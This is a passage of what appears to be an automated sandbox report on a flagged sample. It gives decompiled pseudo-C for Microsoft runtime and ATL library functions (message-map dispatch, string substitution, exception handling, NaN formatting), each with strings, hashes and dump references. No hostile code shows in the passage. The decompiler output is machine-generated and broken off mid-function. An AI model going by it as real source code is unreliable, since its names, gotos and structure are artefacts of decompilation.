                      							__eflags = _v16;
                      							if(_v16 == 0) {
                      								goto L13;
                      							}
                      							_t86 = 1;
                      							goto L34;
                      						}
                      						__eflags = (_a12 & 0xffff) - 1;
                      						if(__eflags != 0) {
                      							goto L9;
                      						}
                      						_v16 = 1;
                      						_t160 = _a12 >> 0x00000010 & 0x0000ffff;
                      						 *_a20 = E009D0D90(_v8, _t180, __eflags, _t160, _a12 & 0x0000ffff, _a16,  &_v16);
                      						__eflags = _v16;
                      						if(_v16 == 0) {
                      							goto L9;
                      						}
                      						_t86 = 1;
                      						goto L34;
                      					}
                      					_v16 = 1;
                      					_t115 = E009D0E20(__ebx, _v8, __edi, __esi, __eflags, _a8, _a12, _a16,  &_v16);
                      					_t160 = _a20;
                      					 *_t160 = _t115;
                      					__eflags = _v16;
                      					if(_v16 == 0) {
                      						goto L5;
                      					}
                      					_t86 = 1;
                      					goto L34;
                      				}
                      				_t117 = E0094F1E0(0xb33748);
                      				E009423E0(__ebx, __edi, __esi, _t184, E009423B0( &_v28, "C:\\Users\\W7H64\\Desktop\\VCSamples-master\\VC2010Samples\\Attributes\\Advanced\\AtlDuck\\DuckDoerDlg.h", 0x26), _t117, 0, "Invalid message map ID (%i)\n", _a24);
                      				_t182 = _t182 + 0x14;
                      				if(0 == 0) {
                      					_t120 = L00994930(0, 2, L"C:\\Users\\W7H64\\Desktop\\VCSamples-master\\VC2010Samples\\Attributes\\Advanced\\AtlDuck\\DuckDoerDlg.h", 0x26, 0, "%ls", 0x9f40dc);
                      					_t182 = _t182 + 0x18;
                      					if(_t120 == 1) {
                      						asm("int3");
                      					}
                      				}
                      				goto L33;
                      			}

                      APIs
                      • _Smanip.LIBCPMTD ref: 00955629
                        • Part of subcall function 009423E0: @_RTC_CheckStackVars@8.LIBCMTD ref: 00942473
                      • @_RTC_CheckStackVars@8.LIBCMTD ref: 0095566A
                      Strings
                      • %ls, xrefs: 00955640
                      • Invalid message map ID (%i), xrefs: 0095560D
                      • C:\Users\W7H64\Desktop\VCSamples-master\VC2010Samples\Attributes\Advanced\AtlDuck\DuckDoerDlg.h, xrefs: 00955649
                      • C:\Users\W7H64\Desktop\VCSamples-master\VC2010Samples\Attributes\Advanced\AtlDuck\DuckDoerDlg.h, xrefs: 00955621
                      Memory Dump Source
                      • Source File: 00000000.00000002.282500177.0000000000941000.00000020.00000001.01000000.00000003.sdmp, Offset: 00940000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_940000_SecuriteInfo.jbxd
                      Similarity
                      • API ID: CheckStackVars@8$Smanip
                      • String ID: %ls$C:\Users\W7H64\Desktop\VCSamples-master\VC2010Samples\Attributes\Advanced\AtlDuck\DuckDoerDlg.h$C:\Users\W7H64\Desktop\VCSamples-master\VC2010Samples\Attributes\Advanced\AtlDuck\DuckDoerDlg.h$Invalid message map ID (%i)
                      • API String ID: 3890940529-3131995353
                      • Opcode ID: 555ad6447f75f7364955d52203f26ebfa392c53dfe7198bd1ea5e0cfebc00d28
                      • Instruction ID: ae351a7525042bd294877f373c18bae6cd4504acc1f04a402f39f54b0f6a6ff5
                      • Opcode Fuzzy Hash: 555ad6447f75f7364955d52203f26ebfa392c53dfe7198bd1ea5e0cfebc00d28
                      • Instruction Fuzzy Hash: D2919BB090460AEFDB14DF5AC862BFE73B9EF84301F508578F9159B281D6789998CF50
                      Uniqueness

                      Uniqueness Score: -1.00%

                      C-Code - Quality: 81%
                      			E00948100(void* __ebx, void* __ecx, void* __edx, void* __edi, void* __esi, CHAR* _a4, signed int _a8, intOrPtr _a12, CHAR** _a16) {
                      				signed int _v8;
                      				intOrPtr _v12;
                      				CHAR** _v16;
                      				CHAR* _v20;
                      				CHAR* _v24;
                      				intOrPtr _v28;
                      				char _v64;
                      				CHAR* _v72;
                      				CHAR* _v76;
                      				char _v84;
                      				signed int _t64;
                      				CHAR* _t70;
                      				void* _t72;
                      				CHAR* _t81;
                      				CHAR* _t83;
                      				CHAR* _t87;
                      				CHAR* _t95;
                      				void* _t100;
                      				intOrPtr _t104;
                      				signed int _t106;
                      				CHAR* _t132;
                      				void* _t134;
                      				void* _t141;
                      				void* _t142;
                      				signed int _t144;
                      				void* _t145;
                      				void* _t146;
                      
                      				_t143 = __esi;
                      				_t100 = __ebx;
                      				_push(__ecx);
                      				_t141 =  &_v84;
                      				memset(_t141, 0xcccccccc, 0x14 << 2);
                      				_t146 = _t145 + 0xc;
                      				_t142 = _t141 + 0x14;
                      				_pop(_t104);
                      				_t64 =  *0xa0600c; // 0x5d529087
                      				_v8 = _t64 ^ _t144;
                      				_v12 = _t104;
                      				if(_a16 != 0) {
                      					_v16 = _a16;
                      					_t132 =  *(_a4 + _a8 * 8);
                      					 *_v16 = _t132;
                      					__eflags =  *_v16;
                      					if( *_v16 != 0) {
                      						_t106 = _a8;
                      						_t132 = _a4;
                      						__eflags = _t132[4 + _t106 * 8] & 0x000000ff;
                      						if((_t132[4 + _t106 * 8] & 0x000000ff) == 0) {
                      							L25:
                      							_t70 = 0;
                      							__eflags = 0;
                      						} else {
                      							E0094E030(_a12);
                      							_v20 =  *_v16;
                      							 *_v16 = 0;
                      							while(1) {
                      								_t132 =  *_v20;
                      								__eflags = _t132;
                      								if(_t132 == 0) {
                      									break;
                      								}
                      								__eflags =  *_v20 - 0x25;
                      								if( *_v20 != 0x25) {
                      									E0094E0B0(_t100, _a12, _t142, _t143, _v20);
                      									goto L23;
                      								} else {
                      									_t143 = _t146;
                      									_t132 = _v20;
                      									_t83 = CharNextA(_t132);
                      									__eflags = _t146 - _t146;
                      									_v20 = E009D1520(_t83, _t146 - _t146);
                      									_t117 =  *_v20;
                      									__eflags =  *_v20 - 0x25;
                      									if( *_v20 != 0x25) {
                      										_t87 = E00951F90(_t117, _v20, 0x25);
                      										_t146 = _t146 + 8;
                      										_v24 = _t87;
                      										__eflags = _v24;
                      										if(__eflags != 0) {
                      											_v28 = _v24 - _v20;
                      											__eflags = _v28 - 0x1f;
                      											if(__eflags <= 0) {
                      												E00942750(_t100, _t142, _t143, __eflags,  &_v64, 0x20, _v20, _v28);
                      												_t146 = _t146 + 0x10;
                      												_t132 =  &_v64;
                      												_v72 = E009473F0(_v12 + 4, _t143, __eflags, _t132);
                      												__eflags = _v72;
                      												if(_v72 != 0) {
                      													_v76 = 0;
                      													while(1) {
                      														__eflags = _v72[_v76];
                      														if(_v72[_v76] == 0) {
                      															break;
                      														}
                      														E0094E0B0(_t100, _a12, _t142, _t143,  &(_v72[_v76]));
                      														_t95 =  &(_v76[1]);
                      														__eflags = _t95;
                      														_v76 = _t95;
                      													}
                      													_v20 = _v24;
                      													goto L21;
                      												} else {
                      													_t70 = 0x80004005;
                      												}
                      											} else {
                      												_t70 = 0x80004005;
                      											}
                      										} else {
                      											_push("Error : closing \'%%\' found\n");
                      											_push(0);
                      											_push(E0094F1F0(0xb337ac));
                      											_push(E009423B0( &_v84, "C:\\Program Files\\Microsoft Visual Studio\\2022\\Community\\VC\\Tools\\MSVC\\14.31.31103\\atlmfc\\include\\atlplus.h", 0x170));
                      											E009423E0(_t100, _t142, _t143, __eflags);
                      											_t146 = _t146 + 0x10;
                      											_t70 = 0x80004005;
                      										}
                      									} else {
                      										E0094E0B0(_t100, _a12, _t142, _t143, _v20);
                      										L21:
                      										L23:
                      										_t143 = _t146;
                      										_t81 = CharNextA(_v20);
                      										__eflags = _t146 - _t146;
                      										_v20 = E009D1520(_t81, _t146 - _t146);
                      										continue;
                      									}
                      								}
                      								goto L26;
                      							}
                      							E0094E0B0(_t100, _a12, _t142, _t143, _v20);
                      							goto L25;
                      						}
                      					} else {
                      						_t70 = 1;
                      					}
                      				} else {
                      					_t70 = 0x80070057;
                      				}
                      				L26:
                      				E009D14C0(_t144, 0x948310);
                      				_t72 = _t70;
                      				_t134 = _t132;
                      				return E009D1520(E00957280(_t72, _t100, _v8 ^ _t144, _t134, _t142, _t143), _t144 - _t146 + 0x50);
                      			}

                      APIs
                      • @_RTC_CheckStackVars@8.LIBCMTD ref: 009482EA
                      Strings
                      • C:\Program Files\Microsoft Visual Studio\2022\Community\VC\Tools\MSVC\14.31.31103\atlmfc\include\atlplus.h, xrefs: 00948205
                      • Error : closing '%%' found, xrefs: 009481EE
                      Memory Dump Source
                      • Source File: 00000000.00000002.282500177.0000000000941000.00000020.00000001.01000000.00000003.sdmp, Offset: 00940000, based on PE: true
                      • Associated: 00000000.00000002.282260111.0000000000940000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.284025026.00000000009D6000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.293211865.0000000000A06000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.293421290.0000000000A07000.00000008.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.296220091.0000000000B2F000.00000008.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.296243296.0000000000B30000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.296264435.0000000000B34000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.296303200.0000000000B36000.00000002.00000001.01000000.00000003.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_940000_SecuriteInfo.jbxd
                      Similarity
                      • API ID: CheckStackVars@8
                      • String ID: C:\Program Files\Microsoft Visual Studio\2022\Community\VC\Tools\MSVC\14.31.31103\atlmfc\include\atlplus.h$Error : closing '%%' found
                      • API String ID: 930174750-1365711956
                      • Opcode ID: 00e83f767e1e99aea3c72084a3a097e28d79783fbc260481c1bfc8db674adbac
                      • Instruction ID: ca2f8814615a9e4bac10077b088f9a21f8657e7609e3d5cc5ed36262266cdaf1
                      • Opcode Fuzzy Hash: 00e83f767e1e99aea3c72084a3a097e28d79783fbc260481c1bfc8db674adbac
                      • Instruction Fuzzy Hash: 0F515A71E04219DFDB04EFA8C891FBFB7B5BF88340F104919E926AB351DA74A941CB90
                      Uniqueness

                      Uniqueness Score: -1.00%

                      C-Code - Quality: 80%
                      			E00959CD0(void* __eflags, void* _a4, intOrPtr _a8, intOrPtr _a12) {
                      				signed char _v5;
                      				intOrPtr _v12;
                      				intOrPtr _v16;
                      				signed int _v20;
                      				signed int _v24;
                      				intOrPtr* _v28;
                      				intOrPtr _v32;
                      				intOrPtr _v36;
                      				intOrPtr _v40;
                      				signed int _v44;
                      				signed char _v48;
                      				intOrPtr _v52;
                      				char _v56;
                      				intOrPtr _t127;
                      				void* _t149;
                      				void* _t152;
                      
                      				_v5 = 0;
                      				_v48 = 1;
                      				 *_a4 = E009CF650( *_a4);
                      				_v12 = _a8 - 8;
                      				_v16 = _v12 + 0x18;
                      				_v24 =  *(_v12 + 0x10) ^  *0xa0600c;
                      				E00959C70(_v24, _v16);
                      				E0095E290(_v16, _a12);
                      				_t152 = _t149 + 0x10;
                      				if(( *(_a4 + 4) & 0x00000066) != 0) {
                      					if( *((intOrPtr*)(_v12 + 0x14)) != 0xfffffffe) {
                      						E0095E4E0(_v12 + 8, 0xfffffffe, _v16, 0xa0600c);
                      						_v5 = 1;
                      					}
                      					goto L19;
                      				} else {
                      					_v56 = _a4;
                      					_v52 = _a12;
                      					 *((intOrPtr*)(_v12 + 4)) =  &_v56;
                      					_v20 =  *((intOrPtr*)(_v12 + 0x14));
                      					while(_v20 != 0xfffffffe) {
                      						_v28 = _v24 + 0x10 + _v20 * 0xc;
                      						_v32 =  *((intOrPtr*)(_v28 + 4));
                      						_v44 =  *_v28;
                      						if(_v32 == 0) {
                      							L15:
                      							_v20 = _v44;
                      							continue;
                      						}
                      						_v36 = E0095E480(_v32, _v16);
                      						_v5 = 1;
                      						if(_v36 >= 0) {
                      							if(_v36 > 0) {
                      								if( *_a4 == 0xe06d7363 &&  *0x9d8790 != 0) {
                      									_t96 = E009CEA70(0x9d8790);
                      									_t152 = _t152 + 4;
                      									if(_t96 != 0) {
                      										_t127 =  *0x9d8790; // 0x95b0e0
                      										_v40 = _t127;
                      										 *0x9d62b0(_a4, 1);
                      										_t96 = _v40();
                      										_t152 = _t152 + 8;
                      									}
                      								}
                      								E0095E4C0(_t96, _v12 + 8, _a4);
                      								if( *((intOrPtr*)(_v12 + 0x14)) != _v20) {
                      									E0095E4E0(_v12 + 8, _v20, _v16, 0xa0600c);
                      								}
                      								 *((intOrPtr*)(_v12 + 0x14)) = _v44;
                      								E00959C70(_v24, _v16);
                      								_t152 = _t152 + 8;
                      								E0095E4A0();
                      							}
                      							goto L15;
                      						}
                      						_v48 = 0;
                      						break;
                      					}
                      					L19:
                      					if((_v5 & 0x000000ff) != 0) {
                      						E00959C70(_v24, _v16);
                      					}
                      					return _v48;
                      				}
                      			}

                      APIs
                      • _ValidateLocalCookies.LIBCMTD ref: 00959D1D
                      • ___except_validate_context_record.LIBVCRUNTIMED ref: 00959D29
                        • Part of subcall function 0095E290: __guard_icall_checks_enforced.LIBCMTD ref: 0095E296
                      • __IsNonwritableInCurrentImage.LIBCMTD ref: 00959DE5
                      • _ValidateLocalCookies.LIBCMTD ref: 00959E50
                      • _ValidateLocalCookies.LIBCMTD ref: 00959EA3
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.282500177.0000000000941000.00000020.00000001.01000000.00000003.sdmp, Offset: 00940000, based on PE: true
                      • Associated: 00000000.00000002.282260111.0000000000940000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.284025026.00000000009D6000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.293211865.0000000000A06000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.293421290.0000000000A07000.00000008.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.296220091.0000000000B2F000.00000008.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.296243296.0000000000B30000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.296264435.0000000000B34000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.296303200.0000000000B36000.00000002.00000001.01000000.00000003.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_940000_SecuriteInfo.jbxd
                      Similarity
                      • API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record__guard_icall_checks_enforced
                      • String ID: csm
                      • API String ID: 3439031638-1018135373
                      • Opcode ID: 3362872983b7947c2892152e2075070b57f5e7a8612f4c3bd441ed84394739bd
                      • Instruction ID: aafb62e96db6f572ed9f64d08218fe791effe96448d29ebc4f5a5a2ab3a83a3a
                      • Opcode Fuzzy Hash: 3362872983b7947c2892152e2075070b57f5e7a8612f4c3bd441ed84394739bd
                      • Instruction Fuzzy Hash: AB516074E00209EFDB08DF95D881AAEBBB5FF88305F108558E8156B391D731EA89CF91
                      Uniqueness

                      Uniqueness Score: -1.00%

                      C-Code - Quality: 97%
                      			E009A9120(intOrPtr _a4) {
                      				char _v8;
                      				signed int* _v12;
                      				char _v16;
                      				void* _t37;
                      				void* _t38;
                      				void* _t39;
                      				void* _t40;
                      				void* _t41;
                      				signed char _t43;
                      				void* _t52;
                      				void* _t54;
                      				void* _t65;
                      				intOrPtr _t89;
                      				void* _t100;
                      				void* _t102;
                      				void* _t103;
                      
                      				_t105 = _a4;
                      				if(_a4 == 0) {
                      					_t65 = L00994930(_t105, 2, L"minkernel\\crts\\ucrt\\src\\appcrt\\stdio\\_sftbuf.cpp", 0x26, 0, L"%ls", L"public_stream != nullptr");
                      					_t100 = _t100 + 0x18;
                      					if(_t65 == 1) {
                      						asm("int3");
                      					}
                      				}
                      				E00976E20( &_v8, _a4);
                      				_t37 = E009BDA70( &_v8, E009A8780(E0097C080( &_v8)));
                      				_t102 = _t100 + 8;
                      				if(_t37 != 0) {
                      					_t38 = E0097C080( &_v8);
                      					_t39 = E009A8A50(1);
                      					_t103 = _t102 + 4;
                      					__eflags = _t38 - _t39;
                      					if(_t38 != _t39) {
                      						_t40 = E0097C080( &_v8);
                      						_t41 = E009A8A50(2);
                      						_t103 = _t103 + 4;
                      						__eflags = _t40 - _t41;
                      						if(_t40 != _t41) {
                      							return 0;
                      						}
                      						_v12 = 0xb31190;
                      						L10:
                      						_t89 =  *0xb31184; // 0x0
                      						 *0xb31184 = _t89 + 1;
                      						_t43 = E009A9000( &_v8);
                      						__eflags = _t43 & 0x000000ff;
                      						if((_t43 & 0x000000ff) == 0) {
                      							E009A9080( &_v8, 0x282);
                      							__eflags =  *_v12;
                      							if( *_v12 == 0) {
                      								 *_v12 = E0099C129(L0095BF60( &_v16, E00999580(0x1000, 2, "minkernel\\crts\\ucrt\\src\\appcrt\\stdio\\_sftbuf.cpp", 0x40)));
                      								E0095BFA0( &_v16);
                      							}
                      							__eflags =  *_v12;
                      							if( *_v12 != 0) {
                      								(E00977320( &_v8))[1] =  *_v12;
                      								 *(E00977320( &_v8)) =  *_v12;
                      								(E00977320( &_v8))[2] = 0x1000;
                      								(E00977320( &_v8))[6] = 0x1000;
                      								return 1;
                      							} else {
                      								_t52 = E00977320( &_v8);
                      								(E00977320( &_v8))[1] = _t52 + 0x14;
                      								_t54 = E00977320( &_v8);
                      								 *(E00977320( &_v8)) = _t54 + 0x14;
                      								(E00977320( &_v8))[2] = 2;
                      								(E00977320( &_v8))[6] = 2;
                      								return 1;
                      							}
                      						}
                      						return 0;
                      					}
                      					_v12 = 0xb3118c;
                      					goto L10;
                      				} else {
                      					return 0;
                      				}
                      			}

                      APIs
                      • std::_Timevec::_Timevec.LIBCPMTD ref: 009A9159
                      • __wcstombs_l.LIBCMTD ref: 009A9214
                        • Part of subcall function 0095BFA0: __crt_unique_heap_ptr.LIBCMTD ref: 0095BFAA
                      Strings
                      • %ls, xrefs: 009A9134
                      • minkernel\crts\ucrt\src\appcrt\stdio\_sftbuf.cpp, xrefs: 009A913D
                      • public_stream != nullptr, xrefs: 009A912F
                      • minkernel\crts\ucrt\src\appcrt\stdio\_sftbuf.cpp, xrefs: 009A9208
                      Memory Dump Source
                      • Source File: 00000000.00000002.282500177.0000000000941000.00000020.00000001.01000000.00000003.sdmp, Offset: 00940000, based on PE: true
                      • Associated: 00000000.00000002.282260111.0000000000940000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.284025026.00000000009D6000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.293211865.0000000000A06000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.293421290.0000000000A07000.00000008.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.296220091.0000000000B2F000.00000008.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.296243296.0000000000B30000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.296264435.0000000000B34000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.296303200.0000000000B36000.00000002.00000001.01000000.00000003.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_940000_SecuriteInfo.jbxd
                      Similarity
                      • API ID: TimevecTimevec::___crt_unique_heap_ptr__wcstombs_lstd::_
                      • String ID: %ls$minkernel\crts\ucrt\src\appcrt\stdio\_sftbuf.cpp$minkernel\crts\ucrt\src\appcrt\stdio\_sftbuf.cpp$public_stream != nullptr
                      • API String ID: 4232693209-3092436121
                      • Opcode ID: bdebc9cd3913de4eb40a876d69d14d9a1f510bde537504f4847ab361f0a2bbf5
                      • Instruction ID: f041c3469dfbba63d46fa1a87219b5f2523e461b3339aedea5495e9cb024346f
                      • Opcode Fuzzy Hash: bdebc9cd3913de4eb40a876d69d14d9a1f510bde537504f4847ab361f0a2bbf5
                      • Instruction Fuzzy Hash: D0417571904104EFDB04EFA4D997BEEB7B4AF91344F6084A4E8062B292EB715F48DBC0
                      Uniqueness

                      Uniqueness Score: -1.00%

                      C-Code - Quality: 93%
                      			E009A7D80(void* __ebx, intOrPtr __edx, void* __edi, void* __esi, intOrPtr _a4, signed int _a8, char* _a12, intOrPtr _a16, signed char _a20) {
                      				signed int _v8;
                      				char* _v12;
                      				char* _v16;
                      				char* _v20;
                      				char* _v24;
                      				char* _v28;
                      				char* _v32;
                      				char* _v36;
                      				char* _v40;
                      				char* _v44;
                      				char* _v48;
                      				char* _v52;
                      				char* _v56;
                      				char* _v60;
                      				char* _v64;
                      				char* _v68;
                      				char* _v72;
                      				void* _v73;
                      				signed char _v74;
                      				void* _v80;
                      				signed int _v84;
                      				signed int _v88;
                      				char _v92;
                      				signed int _t59;
                      				void* _t72;
                      				void* _t77;
                      				void* _t98;
                      				void* _t99;
                      				signed int _t100;
                      
                      				_t99 = __esi;
                      				_t98 = __edi;
                      				_t91 = __edx;
                      				_t77 = __ebx;
                      				_t59 =  *0xa0600c; // 0x5d529087
                      				_v8 = _t59 ^ _t100;
                      				if(_a16 >= (_a8 & 0x000000ff) + 4) {
                      					if((_a8 & 0x000000ff) != 0) {
                      						 *_a12 = 0x2d;
                      						_a12 = _a12 + 1;
                      						 *_a12 = 0;
                      						_a16 = _a16 - 1;
                      					}
                      					_v72 = "INF";
                      					_v68 = "INF";
                      					_v64 = "inf";
                      					_v60 = "inf";
                      					_v56 = "NAN";
                      					_v52 = "NAN";
                      					_v48 = "nan";
                      					_v44 = "nan";
                      					_v40 = "NAN(SNAN)";
                      					_v36 = "NAN";
                      					_v32 = "nan(snan)";
                      					_v28 = "nan";
                      					_v24 = "NAN(IND)";
                      					_v20 = "NAN";
                      					_v16 = "nan(ind)";
                      					_v12 = "nan";
                      					_v84 = _a4 - 1;
                      					if((_a20 & 0x000000ff) == 0) {
                      						_v80 = 2;
                      					} else {
                      						_v80 = 0;
                      					}
                      					_v88 = _v80;
                      					if(_a16 <= E00992E00( *((intOrPtr*)(_t100 + (_v84 << 4) - 0x44 + _v88 * 4)))) {
                      						_v73 = 0;
                      					} else {
                      						_v73 = 1;
                      					}
                      					_v74 = _v73;
                      					if((_v74 & 0x000000ff) != 0) {
                      						_v92 = 0;
                      					} else {
                      						_v92 = 1;
                      					}
                      					_t91 = _a16;
                      					E00994A20(E00992DE0(_a12, _a16,  *((intOrPtr*)(_t100 + (_v84 << 4) - 0x44 + (_v88 + _v92) * 4))), _t70, L"strcpy_s( result_buffer, result_buffer_count, strings[row][column + !long_string_will_fit])", L"fp_format_nan_or_infinity", L"minkernel\\crts\\ucrt\\src\\appcrt\\convert\\cvt.cpp", 0x58, 0);
                      					_t72 = 0;
                      				} else {
                      					 *_a12 = 0;
                      					_t72 = 0xc;
                      				}
                      				return E00957280(_t72, _t77, _v8 ^ _t100, _t91, _t98, _t99);
                      			}

                      APIs
                      Strings
                      • fp_format_nan_or_infinity, xrefs: 009A7EBA
                      • minkernel\crts\ucrt\src\appcrt\convert\cvt.cpp, xrefs: 009A7EB5
                      • strcpy_s( result_buffer, result_buffer_count, strings[row][column + !long_string_will_fit]), xrefs: 009A7EBF
                      Memory Dump Source
                      • Source File: 00000000.00000002.282500177.0000000000941000.00000020.00000001.01000000.00000003.sdmp, Offset: 00940000, based on PE: true
                      • Associated: 00000000.00000002.282260111.0000000000940000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.284025026.00000000009D6000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.293211865.0000000000A06000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.293421290.0000000000A07000.00000008.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.296220091.0000000000B2F000.00000008.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.296243296.0000000000B30000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.296264435.0000000000B34000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.296303200.0000000000B36000.00000002.00000001.01000000.00000003.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_940000_SecuriteInfo.jbxd
                      Similarity
                      • API ID: __aligned_msize__invoke_watson_if_error_strlen
                      • String ID: fp_format_nan_or_infinity$minkernel\crts\ucrt\src\appcrt\convert\cvt.cpp$strcpy_s( result_buffer, result_buffer_count, strings[row][column + !long_string_will_fit])
                      • API String ID: 2470549621-3631232711
                      • Opcode ID: 834b092aa08d12349e4c9226eab2171bf2d8801fba30f429226780d8e23283bd
                      • Instruction ID: 9f7512569d0dfb3001941ff34f34767f80dd5fb7be79d2e7b9d4d0ecd712f329
                      • Opcode Fuzzy Hash: 834b092aa08d12349e4c9226eab2171bf2d8801fba30f429226780d8e23283bd
                      • Instruction Fuzzy Hash: 414147B090938D9BDF21CFA9D8457EEBBF1BF85708F144059E8116B382D3B59909CB91
                      Uniqueness

                      Uniqueness Score: -1.00%

                      C-Code - Quality: 92%
                      			E00965350(void* __ebx, void* __edi, void* __esi, intOrPtr _a4, intOrPtr _a8) {
                      				intOrPtr _v8;
                      				intOrPtr _v12;
                      				intOrPtr _v16;
                      				intOrPtr _v20;
                      				intOrPtr _v24;
                      				intOrPtr _v28;
                      				char _v36;
                      				char _v44;
                      				char _v60;
                      				char* _t34;
                      				signed char _t37;
                      				char* _t38;
                      				intOrPtr _t44;
                      				intOrPtr* _t46;
                      				char* _t53;
                      				char* _t73;
                      				intOrPtr _t74;
                      				char* _t78;
                      				char _t84;
                      
                      				_t34 =  *0xb30640; // 0x0
                      				if( *_t34 != 0) {
                      					_t78 =  *0xb30640; // 0x0
                      					__eflags =  *_t78 - 0x30;
                      					if( *_t78 < 0x30) {
                      						L5:
                      						E00969C90( &_v60);
                      						_t37 = E0095FA10( &_v60);
                      						__eflags = _t37 & 0x000000ff;
                      						if((_t37 & 0x000000ff) == 0) {
                      							L10:
                      							_t38 =  *0xb30640; // 0x0
                      							__eflags =  *_t38;
                      							if( *_t38 != 0) {
                      								_v8 = E0095F350( &_v44, 2);
                      							} else {
                      								_v8 = E0095F350( &_v36, 1);
                      							}
                      							_v12 = _v8;
                      							E0095F240(_a4, _v12);
                      							return _a4;
                      						}
                      						_t44 =  *0xb30640; // 0x0
                      						 *0xb30640 = _t44 + 1;
                      						_t46 = E0095FA30( &_v60);
                      						_v20 =  *_t46;
                      						_v16 =  *((intOrPtr*)(_t46 + 4));
                      						__eflags = _a8 - 0x42;
                      						if(__eflags != 0) {
                      							__eflags = _a8 - 0x41;
                      							if(__eflags != 0) {
                      								goto L10;
                      							}
                      							_push(_v16);
                      							E0095EED0(_v20, __eflags, _a4, _v20);
                      							return _a4;
                      						}
                      						_push(_v16);
                      						L0095EF60(_v20, __eflags, _a4, _v20);
                      						return _a4;
                      					}
                      					_t73 =  *0xb30640; // 0x0
                      					_t84 =  *_t73;
                      					__eflags = _t84 - 0x39;
                      					if(_t84 > 0x39) {
                      						goto L5;
                      					}
                      					_t53 =  *0xb30640; // 0x0
                      					asm("cdq");
                      					_v28 =  *_t53 - 0x2f;
                      					_v24 = _t84;
                      					_t74 =  *0xb30640; // 0x0
                      					 *0xb30640 = _t74 + 1;
                      					E0095F510(__ebx, _a4, __edi, __esi, _v28, _v24);
                      					return _a4;
                      				}
                      				E0095F350(_a4, 1);
                      				return _a4;
                      			}

                      APIs
                      • DName::DName.LIBVCRUNTIMED ref: 00965367
                        • Part of subcall function 0095F350: DNameStatusNode::make.LIBVCRUNTIMED ref: 0095F3AE
                      • DName::DName.LIBVCRUNTIMED ref: 009653BC
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.282500177.0000000000941000.00000020.00000001.01000000.00000003.sdmp, Offset: 00940000, based on PE: true
                      • Associated: 00000000.00000002.282260111.0000000000940000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.284025026.00000000009D6000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.293211865.0000000000A06000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.293421290.0000000000A07000.00000008.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.296220091.0000000000B2F000.00000008.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.296243296.0000000000B30000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.296264435.0000000000B34000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.296303200.0000000000B36000.00000002.00000001.01000000.00000003.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_940000_SecuriteInfo.jbxd
                      Similarity
                      • API ID: Name$Name::$Node::makeStatus
                      • String ID: A
                      • API String ID: 3739413223-3554254475
                      • Opcode ID: 0fdaaaf1bca12408ab3455c0faf1ffa28cdf2b046d931f295eb48ffd1b27048e
                      • Instruction ID: 3a0e820455306257d7b733f930ea2c6ef73739bb3dc838eb2b34e62e996fdb68
                      • Opcode Fuzzy Hash: 0fdaaaf1bca12408ab3455c0faf1ffa28cdf2b046d931f295eb48ffd1b27048e
                      • Instruction Fuzzy Hash: 1C4162B1A00518EFDB08DF95D8A19AE7BB5BF84341F148059F91ADB265DB30EE45CB80
                      Uniqueness

                      Uniqueness Score: -1.00%

                      C-Code - Quality: 66%
                      			E009445F0(void* __ecx, void* __esi, void* _a4, char* _a8, int _a12) {
                      				void* _v8;
                      				void* _v12;
                      				void* _v16;
                      				void* _v20;
                      				void* _v24;
                      				void* _v28;
                      				void* _t37;
                      				long _t39;
                      				void* _t44;
                      				void* _t48;
                      				void* _t64;
                      				void* _t69;
                      				void* _t70;
                      
                      				_t68 = __esi;
                      				_v28 = 0xcccccccc;
                      				_v24 = 0xcccccccc;
                      				_v20 = 0xcccccccc;
                      				_v16 = 0xcccccccc;
                      				_v12 = 0xcccccccc;
                      				_v8 = 0xcccccccc;
